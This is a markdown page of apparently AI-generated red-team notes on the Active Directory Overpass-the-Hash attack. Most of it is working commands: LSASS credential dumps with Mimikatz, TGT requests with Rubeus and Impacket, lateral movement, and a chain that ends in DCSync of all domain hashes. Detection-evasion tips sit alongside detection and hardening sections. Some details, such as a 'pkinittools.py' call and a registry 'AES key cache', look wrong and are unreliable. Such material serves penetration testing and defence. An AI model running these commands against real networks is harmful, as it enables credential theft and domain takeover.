attack-6-overpass-the-hash-pass-the-key.md (25498B)
1 --- 2 title: "Attack #6 β Overpass-the-Hash (Pass-the-Key)" 3 description: "Overpass-the-Hash (OPtH) is a hybrid attack that converts a stolen NTLM hash into a fully valid Kerberos TGT. This is the critical conceptual bridge inβ¦" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "kerberos", "ntlm", "hashing"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/π΄ Attack #6 β Overpass-the-Hash (Pass-the-Key).md" 11 --- 12 # π΄ Attack #6 β Overpass-the-Hash (Pass-the-Key) 13 14 *** 15 16 ## π How It Works 17 18 Overpass-the-Hash (OPtH) is a **hybrid attack that converts a stolen NTLM hash into a fully valid Kerberos TGT**. This is the critical conceptual bridge in the AD attack chain β PtH abuses NTLM directly, PtT replays stolen Kerberos tickets, but Overpass-the-Hash uses a raw NT hash as a cryptographic key to *request* a fresh TGT from the KDC, effectively laundering an NTLM credential into a Kerberos one. Once you have that TGT, you operate entirely within Kerberos β bypassing NTLM-blocking controls, MFA, and many detection signatures simultaneously. 19 20 The attack exploits the internal Windows authentication architecture: when Kerberos pre-authentication runs, it uses a key derived from the user's password β and crucially, the **NT hash IS that key** (RC4-HMAC). The DC cannot distinguish between a key derived legitimately from a password typed by a user and a key supplied directly as an NT hash by an attacker. The result is a legitimate, KDC-signed TGT that grants access to everything the victim account can reach. 21 22 > β οΈ **Windows Server 2022+ / Credential Guard & AES-Only Enforcement:** On hardened systems with AES-only enforcement, RC4 (NT hash) requests are rejected by the KDC entirely. Extraction of AES128/AES256 keys from LSASS becomes essential. Additionally, Credential Guard blocks LSASS access for key extraction. See "Hardening Commands" for mitigation strategies. 23 24 ### Overpass-the-Hash vs Pass-the-Hash vs Pass-the-Ticket 25 26 | Property | PtH | OPtH | PtT | 27 |---|---|---|---| 28 | **Input** | NT hash | NT hash / AES key | Existing Kerberos ticket | 29 | **Protocol** | NTLM | NTLM β converts to **Kerberos** | Kerberos only | 30 | **Output** | NTLM session | **Fresh TGT** + TGS tickets | Reused ticket | 31 | **Works if NTLM blocked** | β | β (Kerberos output) | β | 32 | **Works without live session** | β | β | β (needs existing ticket) | 33 | **AES key support** | β | β (stealthiest variant) | N/A | 34 | **Detection footprint** | 4624 Type 3 NTLM | 4768 + 4769 Kerberos | 4769 Kerberos | 35 36 ### The Full Attack Flow 37 38 ``` 39 1. Compromise any Windows host + escalate to local admin / SYSTEM 40 2. Dump NTLM hash (NT hash) from LSASS β identical to PtH setup phase 41 3. Optionally extract AES128 / AES256 key instead (stealthier, no RC4 downgrade) 42 4. Use Mimikatz sekurlsa::pth OR Rubeus asktgt to: 43 a. Inject the NT hash as a Kerberos RC4 key 44 b. Send a Kerberos AS-REQ to the DC requesting a TGT 45 c. DC validates the key, issues a signed TGT 46 5. TGT injected into current logon session β now operating as victim in Kerberos 47 6. Request TGS for any target service β lateral movement / privilege escalation 48 ``` 49 50 *** 51 52 ## βοΈ Prerequisites 53 54 | Requirement | Detail | 55 |---|---| 56 | **Local admin / SYSTEM on a host** | Required to dump LSASS (NT hash or AES key extraction) | 57 | **NT hash or AES key** | NT hash (RC4) is universal; AES128/256 keys are available from Mimikatz `sekurlsa::ekeys` | 58 | **Port 88 reachable** | Kerberos TGT request goes directly to the DC on UDP/TCP 88 | 59 | **Valid domain account** | The hash must belong to an active, non-locked domain account | 60 | **Domain FQDN / DC IP** | Must know the domain name and DC address for TGT request | 61 62 *** 63 64 ## π οΈ Tools 65 66 | Tool | Platform | Notes | 67 |---|---|---| 68 | **Mimikatz** | Windows | `sekurlsa::pth` with Kerberos flag spawns session + requests TGT | 69 | **Rubeus** | Windows | `asktgt` command β cleanest method; full AES key support | 70 | **Impacket β getTGT.py** | Linux | Hash-to-TGT from Linux; outputs .ccache for use with all Impacket tools | 71 | **Impacket β getST.py** | Linux | Hash-to-TGS directly for specific services | 72 | **NetExec / CrackMapExec** | Linux | `-H` flag with Kerberos auth (`--use-kcache`) after TGT obtained | 73 | **PKINITtools** | Windows/Linux | Use certificate-based PKINIT to request TGT without credentials (advanced) | 74 75 *** 76 77 ## π» Full Commands 78 79 ### π΅ Step 0 β Dump NT Hash AND AES Keys from LSASS 80 81 ```powershell 82 # ββ Mimikatz β dump NT hashes (standard) βββββββββββββββββββββββββββββββββββββ 83 privilege::debug 84 sekurlsa::logonpasswords 85 # Note the 'NTLM' field under each account β that's your NT hash 86 87 # ββ Mimikatz β dump AES keys (stealthier OPtH) βββββββββββββββββββββββββββββββ 88 privilege::debug 89 sekurlsa::ekeys 90 # Note the 'aes256_hmac' and 'aes128_hmac' fields β use these for stealth 91 # AES keys look like: 'b65fb27c8e0d7c5f48b16c10b4c1d91a...' 92 93 # ββ Linux β remote dump via secretsdump ββββββββββββββββββββββββββββββββββββββ 94 secretsdump.py corp.local/Administrator:'Password1'@10.10.10.10 95 # NT hash is the right side of DOMAIN\user:RID:LMhash:NThash::: 96 ``` 97 98 *** 99 100 ### π΄ Mimikatz β Classic OPtH (Windows, Spawns Kerberos Session) 101 102 ```powershell 103 # ββ Standard OPtH with NT hash (RC4) βββββββββββββββββββββββββββββββββββββββββ 104 # This spawns a new cmd.exe process, then AUTOMATICALLY requests a TGT from KDC 105 privilege::debug 106 sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c 107 108 # This opens a new command window β from that window, force Kerberos TGT request: 109 dir \\DC01.corp.local\C$ 110 # The act of accessing a Kerberos resource triggers the TGT request internally 111 112 # ββ OPtH with AES256 key (stealthiest β no RC4 negotiation) ββββββββββββββββββ 113 sekurlsa::pth /user:Administrator /domain:corp.local \ 114 /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 115 116 # ββ OPtH with AES128 key ββββββββββββββββββββββββββββββββββββββββββββββββββββββ 117 sekurlsa::pth /user:svc_sql /domain:corp.local \ 118 /aes128:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 119 120 # ββ OPtH with specific program instead of cmd.exe ββββββββββββββββββββββββββββ 121 sekurlsa::pth /user:Administrator /domain:corp.local \ 122 /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:powershell.exe 123 124 # ββ Verify TGT was obtained from within the spawned shell ββββββββββββββββββββ 125 klist 126 # You should see a TGT for the injected user β proof of successful OPtH 127 ``` 128 129 > **What happens internally:** Mimikatz creates a new logon session (Type 9 β NewCredentials), injects the NT hash as the user's credential material, and when you first touch a Kerberos resource (e.g., `dir \\DC01.corp.local\...`), Windows uses the injected hash as an RC4 key to authenticate to the KDC and request a TGT. From that point on, all authentication flows through Kerberos. 130 131 *** 132 133 ### π΄ Rubeus β asktgt (Windows β Most Explicit & Controllable) 134 135 ```powershell 136 # ββ Request TGT using NT hash (RC4) ββββββββββββββββββββββββββββββββββββββββββ 137 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \ 138 /rc4:8846f7eaee8fb117ad06bdd830b7586c /ptt 139 140 # Request TGT + inject into current session (/ptt = pass-the-ticket) 141 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \ 142 /rc4:8846f7eaee8fb117ad06bdd830b7586c /ptt /nowrap 143 144 # ββ Request TGT using AES256 (stealthiest β no downgrade warning in logs) βββββ 145 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \ 146 /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 147 /ptt /nowrap 148 149 # ββ Request TGT using AES128 βββββββββββββββββββββββββββββββββββββββββββββββββ 150 .\Rubeus.exe asktgt /user:svc_backup /domain:corp.local \ 151 /aes128:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 /ptt 152 153 # ββ Request TGT + save to file (for transfer to Linux) βββββββββββββββββββββββ 154 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \ 155 /rc4:8846f7eaee8fb117ad06bdd830b7586c /outfile:admin.kirbi 156 157 # ββ Request TGT + immediately request TGS for specific service βββββββββββββββ 158 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \ 159 /rc4:8846f7eaee8fb117ad06bdd830b7586c /ptt 160 161 .\Rubeus.exe asktgs /service:cifs/DC01.corp.local /ptt 162 163 # ββ Specify DC explicitly (useful in multi-domain environments) βββββββββββββββ 164 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \ 165 /rc4:8846f7eaee8fb117ad06bdd830b7586c /dc:10.10.10.10 /ptt 166 167 # ββ Verify TGT injection ββββββββββββββββββββββββββββββββββββββββββββββββββββββ 168 .\Rubeus.exe triage 169 klist 170 ``` 171 172 *** 173 174 ### π΄ Impacket β getTGT.py (Linux β Hash β ccache Ticket) 175 176 ```bash 177 # ββ NT hash β TGT (saves as Administrator.ccache) βββββββββββββββββββββββββββ 178 getTGT.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \ 179 -dc-ip 10.10.10.10 180 181 # ββ AES256 key β TGT (stealthiest from Linux) ββββββββββββββββββββββββββββββββ 182 getTGT.py corp.local/Administrator \ 183 -aesKey b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 184 -dc-ip 10.10.10.10 185 186 # ββ Plaintext password β TGT (standard β for reference) βββββββββββββββββββββ 187 getTGT.py corp.local/Administrator:'Password1' -dc-ip 10.10.10.10 188 189 # ββ Set the TGT ccache for use by all Impacket tools βββββββββββββββββββββββββ 190 export KRB5CCNAME=Administrator.ccache 191 192 # ββ Use the TGT for lateral movement βββββββββββββββββββββββββββββββββββββββββ 193 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 194 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 195 smbexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 196 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local 197 198 # ββ NetExec with the obtained TGT ββββββββββββββββββββββββββββββββββββββββββββ 199 export KRB5CCNAME=Administrator.ccache 200 nxc smb DC01.corp.local --use-kcache 201 nxc smb DC01.corp.local --use-kcache -x "whoami /all" 202 nxc winrm DC01.corp.local --use-kcache 203 204 # ββ Evil-WinRM with TGT βββββββββββββββββββββββββββββββββββββββββββββββββββββββ 205 export KRB5CCNAME=Administrator.ccache 206 evil-winrm -i DC01.corp.local -r corp.local 207 ``` 208 209 *** 210 211 ### π΄ Impacket β getST.py (Linux β Hash β Specific Service Ticket) 212 213 ```bash 214 # Skip the TGT step entirely β go straight to a TGS for a specific service 215 # Useful when you know exactly what you want to access 216 217 # Get CIFS TGS (file share access) using NT hash 218 getST.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \ 219 -spn cifs/DC01.corp.local -dc-ip 10.10.10.10 220 221 # Get HOST TGS (remote execution via PsExec) 222 getST.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \ 223 -spn host/DC01.corp.local -dc-ip 10.10.10.10 224 225 # Get LDAP TGS (BloodHound, LDAP queries, DCSync) 226 getST.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \ 227 -spn ldap/DC01.corp.local -dc-ip 10.10.10.10 228 229 # Get HTTP TGS (web services, Exchange) 230 getST.py corp.local/svc_http -hashes :a87f3a337d73085c45f9416be5787d86 \ 231 -spn http/MAIL01.corp.local -dc-ip 10.10.10.10 232 233 # ββ Use the service ticket ββββββββββββββββββββββββββββββββββββββββββββββββββββ 234 export KRB5CCNAME=Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccache 235 smbclient.py -k -no-pass corp.local/Administrator@DC01.corp.local 236 ``` 237 238 *** 239 240 ### π΄ PKINITtools β Certificate-Based TGT Request (Advanced) 241 242 ```powershell 243 # ββ Get DER certificate from compromised user (if available) ββββββββββββββββ 244 # Export user certificate from smartcard or AD user object 245 certutil -user -enterprise -p "password" -exportpfx "LDAP:///CN=Administrator,CN=Users,DC=corp,DC=local" output.pfx 246 247 # ββ Use PKINITtools to request TGT with certificate ββββββββββββββββββββββββββ 248 # Note: Requires user certificate in .pfx format; no password/hash needed 249 python3 pkinittools.py \ 250 -certificate output.pfx \ 251 -password "cert_password" \ 252 -domain corp.local \ 253 -dc-ip 10.10.10.10 254 255 # Resulting TGT can be used with any of the above methods 256 ``` 257 258 *** 259 260 ### π΄ Full OPtH β DCSync Chain (Linux) 261 262 ```bash 263 # Step 1 β Convert NT hash to TGT 264 getTGT.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \ 265 -dc-ip 10.10.10.10 266 267 # Step 2 β Set TGT 268 export KRB5CCNAME=Administrator.ccache 269 270 # Step 3 β Get LDAP TGS for DCSync (requires Replication rights) 271 getST.py corp.local/Administrator -k -no-pass \ 272 -spn ldap/DC01.corp.local -dc-ip 10.10.10.10 273 274 # Step 4 β DCSync all domain hashes using Kerberos ticket 275 export KRB5CCNAME=Administrator@ldap_DC01.corp.local@CORP.LOCAL.ccache 276 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local -just-dc-ntlm 277 278 # Result: All domain user NTLM hashes β game over 279 ``` 280 281 *** 282 283 ## π― OPSEC Tips 284 285 - **Always prefer AES256 over RC4** β RC4 (NT hash) downgrade in a modern AES-enforcement environment is a near-instant detection signature 286 - **Extract AES keys with `sekurlsa::ekeys`** in Mimikatz β same LSASS access, but produces AES128/256 keys that blend into normal Kerberos traffic 287 - **Use Rubeus `asktgt` over Mimikatz `sekurlsa::pth`** for more granular control and cleaner ticket format β Mimikatz's internal TGT request is less predictable 288 - **Name your ccache file sensibly** β `Administrator.ccache` is readable; rename to something benign for long-term operations 289 - **Use FQDN not IP** β Kerberos is hostname-based; `DC01.corp.local` works, `10.10.10.10` does not 290 - **AES key OPtH produces Event 4768 with `etype:18`** (AES256) which is indistinguishable from legitimate user authentication in most environments 291 - **RC4 OPtH produces Event 4768 with `etype:23`** (RC4) β in AES-enforced domains this is an immediate red flag; avoid unless RC4 is still standard 292 293 ### OpSec Ranking by Stealth 294 295 | Method | Stealth | Speed | Notes | 296 |---|---|---|---| 297 | **AES256 via Rubeus asktgt** | βββββ | Fast | No RC4 downgrade, blends perfectly into normal Kerberos traffic | 298 | **AES256 via getTGT.py (Linux)** | βββββ | Fast | Off-network execution, minimal DC communication | 299 | **RC4 via Rubeus asktgt** | βββ | Fast | Detectable in AES-enforced domains (etype:23 anomaly) | 300 | **Mimikatz sekurlsa::pth + Kerberos** | ββ | Medium | Tool signature + Type 9 logon event = high detection risk | 301 | **PKINITtools (certificate-based)** | βββββ | Medium | No hash/password needed; requires certificate access | 302 303 ### Time-to-Execute Estimates 304 305 - **Full OPtH with Rubeus (extract hash β asktgt β ptt β access resource):** 3 minutes 306 - **Linux OPtH chain (getTGT β getST β secretsdump):** 5 minutes 307 - **Mimikatz sekurlsa::pth (spawn session + wait for Kerberos use):** 2β4 minutes 308 - **PKINITtools certificate request:** 2 minutes 309 310 ### Tool Version Compatibility 311 312 - **Rubeus v1.6.4+:** `asktgt` command fully stable with RC4, AES support; no major regressions 313 - **Mimikatz 2.2.0+:** `sekurlsa::pth` and `sekurlsa::ekeys` work consistently across Windows versions 314 - **Impacket (current):** getTGT.py, getST.py fully support RC4/AES; requires Python 3.6+ 315 - **NetExec latest:** `--use-kcache` works with ccache from OPtH + getTGT chain 316 - **Evil-WinRM v4.0+:** KRB5CCNAME stable; requires krb5-user library on Linux 317 318 *** 319 320 ## π‘οΈ Detection β Event IDs 321 322 | Event ID | Source | What to Look For | 323 |---|---|---| 324 | **4768** | Security Log | TGT requested β **`EncryptionType: 0x17` (RC4/etype 23)** in an AES-enforced domain | 325 | **4768** | Security Log | TGT request originates from **unexpected workstation** for that user account | 326 | **4624** | Security Log | Logon **Type 9 (NewCredentials)** β Mimikatz `sekurlsa::pth` always creates this logon type | 327 | **4648** | Security Log | Logon with explicit credentials β attacker accessing remote resource post-OPtH | 328 | **4769** | Security Log | TGS requested immediately after a suspicious 4768 β confirms ticket is being used | 329 | **Sysmon EID 10** | Sysmon | LSASS process access β AES key extraction same as NT hash dump | 330 | **Sysmon EID 1** | Sysmon | `Rubeus.exe` or `Mimikatz.exe` process creation | 331 332 **Primary detection signature:** Event 4768 with `EncryptionType: 0x17` (RC4) from a host where the user is not currently interactively logged in, followed immediately by a 4769 TGS request. The Type 9 logon event (4624) from Mimikatz `pth` is also highly anomalous and rarely appears in legitimate traffic β a single Type 9 event warrants investigation. 333 334 *** 335 336 ## π§© Troubleshooting 337 338 | Error | Cause | Fix | 339 |---|---|---| 340 | `KRB_AP_ERR_SKEW` | System time skew between attacker and DC (>5 min) | Sync attacker system time with DC: `net time \\DC01 /set` or `timedatectl set-ntp true` | 341 | `KDC_ERR_ETYPE_NOSUPP` | Encryption type not supported (RC4 requested but AES-only enforced) | Extract AES key via `sekurlsa::ekeys`; use AES key with asktgt or getTGT.py | 342 | `KDC_ERR_PREAUTH_FAILED` | NT hash/AES key is incorrect or account is disabled/locked | Verify hash accuracy from LSASS dump; check AD for account lockout status | 343 | `ERR_KRB5_KDC_UNREACH` | Cannot reach KDC on port 88 (firewall, routing, or DNS) | Test: `nc -zv DC01.corp.local 88`; verify DNS resolves DC FQDN correctly | 344 | `KDC_ERR_C_PRINCIPAL_UNKNOWN` | User account does not exist in domain or is misspelled | Verify account name matches AD; check domain FQDN | 345 | `Rubeus asktgt returns null TGT` | DC rejected the Kerberos request (likely bad hash or pre-auth failure) | Re-verify NT hash from LSASS; check account pre-auth requirements in AD | 346 | `Type 9 logon in security log (immediate detection)** | Mimikatz `sekurlsa::pth` creates this signature automatically | Switch to Rubeus `asktgt` which doesn't generate Type 9 events | 347 | `FIPS mode rejects RC4 OPtH` | System has FIPS 140-2 enabled; RC4 disabled | Use AES256/AES128 key extraction instead of NT hash | 348 349 *** 350 351 ## πΊοΈ MITRE ATT&CK 352 353 **Technique:** T1550.002 β Use Alternate Authentication Material: Pass the Hash 354 **Tactic:** TA0008 β Lateral Movement 355 356 ### Known APT Groups Using OPtH 357 358 - **APT29 (Cozy Bear):** Leverages OPtH to bypass NTLM-disabled defenses and maintain persistence in Kerberos-only environments 359 - **FIN6 (Magecart operators):** Uses OPtH chains for sustained lateral movement in retail and hospitality environments 360 - **Wizard Spider (Conti operators):** Combines OPtH with Golden Ticket generation for long-term domain control 361 - **HAFNIUM (State-sponsored, China-based):** Employs OPtH in post-exploitation chains following Exchange Server compromise 362 363 **Detection baseline:** Organizations using Defender for Identity should flag RC4 TGT requests (etype:23) in AES-only environments as critical alerts. AES TGT requests with suspicious source IPs should trigger investigation. 364 365 *** 366 367 ## π‘οΈ Advanced Detection & Hardening 368 369 ### Sigma Rule References 370 371 - **Sigma Rule: RC4 OPtH in AES-enforced environment** β Event 4768 with etype:23 from non-user workstation 372 - **Sigma Rule: Type 9 logon + Kerberos activity** β Event 4624 (Type 9) followed by 4768/4769 within 60 seconds 373 - **Sigma Rule: AES key extraction** β Sysmon EID 10 (LSASS access) + sekurlsa::ekeys string detection 374 375 ### EDR Detections (Defender for Identity) 376 377 - **"Suspicious encryption type downgrade"** β RC4 TGT request when domain policy enforces AES 378 - **"Impossible travel"** β OPtH TGT created on one host but used immediately on another 379 - **"LSASS credential access + Kerberos activity"** β Combination of memory access and unexpected TGT request 380 381 ### Hardening Commands 382 383 ```powershell 384 # ββ Enforce AES-only Kerberos (disable RC4) βββββββββββββββββββββββββββββββββββ 385 # On DC: Set encryption types to 28 (AES128 + AES256 only) 386 Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\Parameters" \ 387 -Name "SupportedEncryptionTypes" -Value 28 388 389 # ββ Enable Credential Guard (blocks LSASS memory access) βββββββββββββββββββββ 390 dism /online /enable-feature /featurename:IsolatedUserMode 391 392 # ββ Enforce Protected Users group (prevents RC4 fallback) βββββββββββββββββββ 393 Add-ADGroupMember -Identity "Protected Users" -Members "CN=Administrator,CN=Users,DC=corp,DC=local" 394 395 # ββ Set maximum TGT lifetime (reduce reuse window) βββββββββββββββββββββββββ 396 # Via GPO: Kerberos Policy > Maximum lifetime for user ticket = 4 hours (default 10) 397 398 # ββ Monitor for Type 9 logon events (Mimikatz signature) ββββββββββββββββββββββ 399 # Create alert for Event 4624 with LogonType=9 from unexpected sources 400 ``` 401 402 ### Forensic Artifacts (What Survives) 403 404 | Artifact | Location | Survives Cleanup | Notes | 405 |---|---|---|---| 406 | **Event 4768 (TGT request)** | Security Event Log | Yes (unless purged) | Primary detection source; etype field is critical | 407 | **Event 4624 Type 9 logon** | Security Event Log | Yes | Mimikatz sekurlsa::pth signature β rarely legitimate | 408 | **NT hash in LSASS dump** | Pagefile, hiberfil.sys | If not cleared | Post-mortem DFIR via Volatility | 409 | **LSASS process access (Sysmon)** | Sysmon event log | Yes | EID 10 correlates with OPtH timing | 410 | **ccache file (Linux)** | /tmp/krb5cc_* | No β delete immediately | Not useful after ticket expires or is rotated | 411 | **Rubeus/Mimikatz execution** | Sysmon EID 1, MFT | Yes | Tool signatures in process creation logs | 412 | **Registry AES key cache** | User registry hive | Yes | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | 413 414 *** 415 416 ## π Attack Chain Context 417 418 ``` 419 [Overpass-the-Hash] βββ Fresh Kerberos TGT as Target User 420 β 421 ββββ π« Pass-the-Ticket (inject TGT, access any domain resource) 422 ββββ π©Έ DCSync β use LDAP TGS with DA TGT to dump all hashes 423 ββββ π« Golden Ticket β KRBTGT hash from DCSync β forge unlimited TGTs 424 ββββ π Bypass NTLM-blocking security controls entirely 425 ββββ π Cross-domain β use TGT to request inter-realm tickets 426 ββββ π― MFA bypass β TGT already authenticated, no MFA prompt triggered 427 ``` 428 429 ### Cross-References to Related Attacks 430 431 - **Attack #4 β Pass-the-Hash (PtH):** Uses NT hash with NTLM directly; OPtH converts hash to Kerberos 432 - **Attack #5 β Pass-the-Ticket (PtT):** Takes output TGT from OPtH and injects it into other sessions 433 - **Attack #11 β Golden Ticket:** If you obtain KRBTGT hash (via DCSync using OPtH), forge unlimited TGTs 434 - **Attack #12 β Silver Ticket:** Forge service-specific tickets; complementary to OPtH 435 - **Attack #16 β Constrained Delegation (S4U2Self/S4U2Proxy):** Uses TGTs to request tickets on behalf of other users 436 437 ### When to Use OPtH vs PtH 438 439 Use **PtH** when: NTLM is available, you want immediate access, and speed matters over stealth. 440 441 Use **OPtH** when: the target enforces Kerberos-only authentication, NTLM is blocked or monitored, you want a long-lived TGT for sustained access, or you have AES keys and want to leave minimal forensic trace. 442 443 *** 444 445 > β **Attack #6 β Overpass-the-Hash complete.** Tell me to move on when you're ready for **Attack #7 β NTLM Relay Attacks**. 446 447 Sources 448 How to Defend Against an Overpass the Hash Attack - Semperis https://www.semperis.com/blog/how-to-defend-against-overpass-the-hash-attack/ 449 Pass-the-Key (Overpass-the-... https://www.vaadata.com/blog/what-is-pass-the-hash-attacks-types-and-security-best-practices/ 450 Overpass-the-Hash Attack: Principles and Detection https://blog.netwrix.com/2022/10/04/overpass-the-hash-attacks/ 451 Use Alternate Authentication Material: Pass the Hash https://attack.mitre.org/techniques/T1550/002/ 452 Active Directory Attack Chain: PtH β OPtH β PtT β DCSync https://www.semperis.com/blog/active-directory-attack-chains/